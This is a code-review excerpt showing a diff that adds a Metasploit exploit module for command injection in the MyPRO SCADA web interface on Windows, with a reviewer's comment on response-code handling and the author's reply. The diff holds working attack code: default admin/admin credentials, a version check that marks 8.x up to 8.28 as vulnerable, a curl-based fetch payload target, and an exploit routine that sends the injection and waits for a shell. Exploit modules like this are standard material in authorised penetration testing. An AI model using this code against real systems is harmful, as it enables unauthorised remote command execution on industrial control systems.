modules/exploits/windows/scada/mypro_cmdexe.rb

```diff
@@ -0,0 +1,174 @@
+            'Windows_Fetch',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => 'win',
+              'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },
+              'Type' => :win_fetch
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'USERNAME',
+          [ true, 'The username to authenticate with (default: admin)', 'admin' ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [ true, 'The password to authenticate with (default: admin)', 'admin' ]
+        ),
+        OptString.new(
+          'TARGETURI',
+          [ true, 'The URI for the MyPRO web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  # Determine if the MyPRO instance runs a vulnerable version
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'l.fcgi'),
+        'vars_post' => {
+          't' => '98'
+        }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      return CheckCode::Unknown
+    ensure
+      disconnect
+    end
+
+    if res && res.code == 200
+      regex = /\{.*\}/m
+      json_body = res.body[regex, 0]
+      data = JSON.parse(json_body)
+      version = data['V']
+      if version.nil?
+        return CheckCode::Unknown
+      else
+        vprint_status('Version retrieved: ' + version)
+      end
+
+      parts = version.split('.')
+      major = parts[0]
+      minor = parts[1]
+      if major.to_i == 8 && minor.to_i <= 28
+        return CheckCode::Appears
+      else
+        return CheckCode::Safe
+      end
+    else
+      return CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    connect
+    case target['Type']
+    when :win_fetch
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd)
+    print_status('Checking credentials...')
+    check_auth
+    print_status('Sending command injection...')
+    exec_mypro(cmd)
+    print_status('Exploit finished, check thy shell.')
+    handler
+  end
+
+  # Check if credentials are working
+  def check_auth
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'sss2'),
+      'headers' => {
+        'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+    if res && res.code == 401
+      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
+    end
+    if res && res.code == 200
+      print_good('Credentials are working.')
+    end
```

Comment:
I am a bit worried to not cover all the cases here. I was thinking to something like:
```suggestion
    case res.code
    when 200
      print_good('Credentials are working.')
    when 401
      fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')
    else
      fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')
    end
```
also we may not need to check `res != nil` after line 132.

Reply:
Thank you, I've updated the code to reflect your suggestion.